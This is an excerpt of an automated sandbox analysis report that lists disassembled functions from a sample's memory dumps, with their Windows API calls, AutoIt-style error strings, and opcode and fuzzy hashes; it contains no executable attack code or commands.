                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: f029eada80fb4e1a5369ff2477d86b1ba212b01ff9a5bc5898f545380791ba17
                                                                                • Instruction ID: 1d6c52a973114ee2cc03724244e2e594f7a16fda366064af8acb072902786939
                                                                                • Opcode Fuzzy Hash: f029eada80fb4e1a5369ff2477d86b1ba212b01ff9a5bc5898f545380791ba17
                                                                                • Instruction Fuzzy Hash: 5841F931508AC0BAC73D9B2AD89877A7FA3BB56320F15543DE0C7D6562CE71A880CF51
                                                                                Function 00662D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00662D1B
                                                                                • GetDC.USER32(00000000), ref: 00662D23
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00662D2E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00662D3A
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00662D76
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00662D87
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00665A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00662DC2
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00662DE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 96a7dbec3cdc5b53510bdab8de87a4b700476c50ba2e16f88fae0deac07df625
                                                                                • Instruction ID: 7027aa665aaafc881097522dec8ebea18e5ab7f8ccf0bdec9ea0029a54f5684d
                                                                                • Opcode Fuzzy Hash: 96a7dbec3cdc5b53510bdab8de87a4b700476c50ba2e16f88fae0deac07df625
                                                                                • Instruction Fuzzy Hash: FF316B72201A54BBEB118F50CC8AFFB3BAAEF09725F045055FE48DA291C6B59C50CBA4
                                                                                Function 00635622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                • Opcode ID: 4cdaf7aa333f1d5a95103372e5773d8869a18ef190998c82a42b92b4c15ce6f1
                                                                                • Instruction ID: 88bfbd1ba3f2ef85bea777d47250ff4ee33099fd916670bc4a0081d5a0b68a1e
                                                                                • Opcode Fuzzy Hash: 4cdaf7aa333f1d5a95103372e5773d8869a18ef190998c82a42b92b4c15ce6f1
                                                                                • Instruction Fuzzy Hash: C921C5B1644E0AB7D21456209D93FFB235FAF62384F850420FE079B691F725ED11C1E9
                                                                                Function 00654FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 4d5f5f9fb9c710e1066cad88a5858db0f2d3a2ebae8b910034406709526f8af1
                                                                                • Instruction ID: fc5d930ff26a4b2f75c0d0aa2d4d4deec3f46a1cab42d899609ba02c801a7a93
                                                                                • Opcode Fuzzy Hash: 4d5f5f9fb9c710e1066cad88a5858db0f2d3a2ebae8b910034406709526f8af1
                                                                                • Instruction Fuzzy Hash: 5ED1C271A0060A9FDF10CF98C895BEEB7B6BF48355F148069E916AB380E771DD49CB90
                                                                                Function 00611522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006115CE
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00611651
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006117FB,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006116E4
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006116FB
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00611777
                                                                                • __freea.LIBCMT ref: 006117A2
                                                                                • __freea.LIBCMT ref: 006117AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 2829977744-0
                                                                                • Opcode ID: b75f48e45a75d24729a0b7fa591b12ba62e75b77fdb14ec279c24783261a7b68
                                                                                • Instruction ID: 1ae64228f69ea94145ec1c10e95eca12e64be0f845505b686e0ee145724be94a
                                                                                • Opcode Fuzzy Hash: b75f48e45a75d24729a0b7fa591b12ba62e75b77fdb14ec279c24783261a7b68
                                                                                • Instruction Fuzzy Hash: 6E91A4B1E002169ADF248E74C851AEEBBB79F4A310F1C4659EA01EF391D735DD81C7A0
                                                                                Function 00654523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2610073882-625585964
                                                                                • Opcode ID: b99d6657ea29d7431fc5fe9f3b2468a340f5db009ebce41041bdfcedc47da1c0
                                                                                • Instruction ID: 18dc580a4945ba32eac89601a2237c15c383ce908f9ed767edbed9874a62ef0c
                                                                                • Opcode Fuzzy Hash: b99d6657ea29d7431fc5fe9f3b2468a340f5db009ebce41041bdfcedc47da1c0
                                                                                • Instruction Fuzzy Hash: 85918471A00215ABDF24CFA5C844FEE7BBAEF45715F108599F905AB280DB709989CFA0
                                                                                Function 00641187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0064125C
                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00641284
                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006412A8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006412D8
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0064135F
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006413C4
                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00641430
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                • String ID:
                                                                                • API String ID: 2550207440-0
                                                                                • Opcode ID: b7799c3710bedcb1c40102fd6330aa3ce9951877ba67ba859025e31c870a3c77
                                                                                • Instruction ID: a7012340d8a6f634200d43cb116d6ada5aa1a2a16b4fbac0fae1a2460c64138a
                                                                                • Opcode Fuzzy Hash: b7799c3710bedcb1c40102fd6330aa3ce9951877ba67ba859025e31c870a3c77
                                                                                • Instruction Fuzzy Hash: 3B91D375A002199FDB01DF98C885BFEB7F6FF46325F144029E540EB291D7B4A981CB94
                                                                                Function 005E948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: 743f8843ca9a2c921c92c0637bb133ff3b13d9ace2a7ffa04c0c98a5fa9cb778
                                                                                • Instruction ID: 2c0222e228939eb3eed1f48f2af99689ed62d354bdd2d7a0091f6280e357d384
                                                                                • Opcode Fuzzy Hash: 743f8843ca9a2c921c92c0637bb133ff3b13d9ace2a7ffa04c0c98a5fa9cb778
                                                                                • Instruction Fuzzy Hash: F5913671D0025AEFCB14CFA9C888AEEBFB9FF88320F144446E555B7251D275AA41CBA0
                                                                                Function 00653947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0065396B
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00653A7A
                                                                                • _wcslen.LIBCMT ref: 00653A8A
                                                                                • VariantClear.OLEAUT32(?), ref: 00653C1F
                                                                                  • Part of subcall function 00640CDF: VariantInit.OLEAUT32(00000000), ref: 00640D1F
                                                                                  • Part of subcall function 00640CDF: VariantCopy.OLEAUT32(?,?), ref: 00640D28
                                                                                  • Part of subcall function 00640CDF: VariantClear.OLEAUT32(?), ref: 00640D34
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4137639002-1221869570
                                                                                • Opcode ID: a843468b7d510020846bf733855958e96cac3c4ca310adfd9427b738c4661d65
                                                                                • Instruction ID: 2d8243f4e40720f9f156b10150ac1f0f202c348214d09616bc49f808511ef112
                                                                                • Opcode Fuzzy Hash: a843468b7d510020846bf733855958e96cac3c4ca310adfd9427b738c4661d65
                                                                                • Instruction Fuzzy Hash: C2919D746083059FC714DF28C48486ABBE6FF88755F04892EF8898B351DB31EE09CB92
                                                                                Function 00654BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0063000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?,?,0063035E), ref: 0063002B
                                                                                  • Part of subcall function 0063000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630046
                                                                                  • Part of subcall function 0063000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630054
                                                                                  • Part of subcall function 0063000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?), ref: 00630064
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00654C51
                                                                                • _wcslen.LIBCMT ref: 00654D59
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00654DCF
                                                                                • CoTaskMemFree.OLE32(?), ref: 00654DDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 614568839-2785691316
                                                                                • Opcode ID: 03f951388b3916c494d3beca379a2b0b0bea69dd1704f032df58a8e888948aa6
                                                                                • Instruction ID: 2620334fe04639bd465e6382871a0126529c4807b3ce8e84fd85c7b7e064969d
                                                                                • Opcode Fuzzy Hash: 03f951388b3916c494d3beca379a2b0b0bea69dd1704f032df58a8e888948aa6
                                                                                • Instruction Fuzzy Hash: 94914971D0021DAFDF24DFA4D895AEEBBB9BF48314F10416AE915A7241DB309E49CFA0
                                                                                Function 006620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 00662183
                                                                                • GetMenuItemCount.USER32(00000000), ref: 006621B5
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006621DD
                                                                                • _wcslen.LIBCMT ref: 00662213
                                                                                • GetMenuItemID.USER32(?,?), ref: 0066224D
                                                                                • GetSubMenu.USER32(?,?), ref: 0066225B
                                                                                  • Part of subcall function 00633A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00633A57
                                                                                  • Part of subcall function 00633A3D: GetCurrentThreadId.KERNEL32 ref: 00633A5E
                                                                                  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006622E3
                                                                                  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                • String ID:
                                                                                • API String ID: 4196846111-0
                                                                                • Opcode ID: beb0e780928ed0339c08098c8559fa1e0b2b510c1eb285815c233b2775d5e77f
                                                                                • Instruction ID: aa57f621f6c066d5ee869b0de1ed9e4a5c652c73581809ed2522e4baaf15b14b
                                                                                • Opcode Fuzzy Hash: beb0e780928ed0339c08098c8559fa1e0b2b510c1eb285815c233b2775d5e77f
                                                                                • Instruction Fuzzy Hash: 04718275E00606AFCB10DF64C855AAEBBF6FF88320F148459E956EB341D774EE418B90
                                                                                Function 0063AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0063AEF9
                                                                                • GetKeyboardState.USER32(?), ref: 0063AF0E
                                                                                • SetKeyboardState.USER32(?), ref: 0063AF6F
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0063AF9D
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0063AFBC
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 0063AFFD
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0063B020
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: 3b59f66234a13ebff61d0200ea54752cda9b2994ba01e1a75b44f2225766b9ab
                                                                                • Instruction ID: 9ed5f08e0dd6e1ac1d09483020db6aeb240023d74cf91f84684dd43b41116077
                                                                                • Opcode Fuzzy Hash: 3b59f66234a13ebff61d0200ea54752cda9b2994ba01e1a75b44f2225766b9ab
                                                                                • Instruction Fuzzy Hash: D151D0A06046D53DFB364274CC45BFBBEAA5B06304F08958DE2D9999C2C3D8A8C8E791
                                                                                Function 0063ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 0063AD19
                                                                                • GetKeyboardState.USER32(?), ref: 0063AD2E
                                                                                • SetKeyboardState.USER32(?), ref: 0063AD8F
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0063ADBB
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0063ADD8
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0063AE17
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0063AE38
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: a397d1908220d58d4c90a1084905ceed6e1daf086ba55738288a047b86c2ef8d
                                                                                • Instruction ID: 3612924afc21cb8f74daeb7c110089362c1b330a09b457ecd0ced91c941976b5
                                                                                • Opcode Fuzzy Hash: a397d1908220d58d4c90a1084905ceed6e1daf086ba55738288a047b86c2ef8d
                                                                                • Instruction Fuzzy Hash: 0651D4B16047D53DFB3683B4CC55BBA7EAA5F46300F088588E1D54A9C2D294ED88F7E2
                                                                                Function 0060542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(00613CD6,?,?,?,?,?,?,?,?,00605BA3,?,?,00613CD6,?,?), ref: 00605470
                                                                                • __fassign.LIBCMT ref: 006054EB
                                                                                • __fassign.LIBCMT ref: 00605506
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00613CD6,00000005,00000000,00000000), ref: 0060552C
                                                                                • WriteFile.KERNEL32(?,00613CD6,00000000,00605BA3,00000000,?,?,?,?,?,?,?,?,?,00605BA3,?), ref: 0060554B
                                                                                • WriteFile.KERNEL32(?,?,00000001,00605BA3,00000000,?,?,?,?,?,?,?,?,?,00605BA3,?), ref: 00605584
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: 3583c4418a844214423aa3c6d6d974fd5d2cfafdabe249e6cc4a2daf79bb2dc3
                                                                                • Instruction ID: 1ac741aea1acae8a48eafcfb1596d3b384a42c46ab89f9657dc4abec43d48c12
                                                                                • Opcode Fuzzy Hash: 3583c4418a844214423aa3c6d6d974fd5d2cfafdabe249e6cc4a2daf79bb2dc3
                                                                                • Instruction Fuzzy Hash: F651C070A006499FDB15CFA8DC45AEFBBFAEF09300F14455AE956E7291E730AA41CF60
                                                                                Function 006510B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0065304E: inet_addr.WSOCK32(?), ref: 0065307A
                                                                                  • Part of subcall function 0065304E: _wcslen.LIBCMT ref: 0065309B
                                                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00651112
                                                                                • WSAGetLastError.WSOCK32 ref: 00651121
                                                                                • WSAGetLastError.WSOCK32 ref: 006511C9
                                                                                • closesocket.WSOCK32(00000000), ref: 006511F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
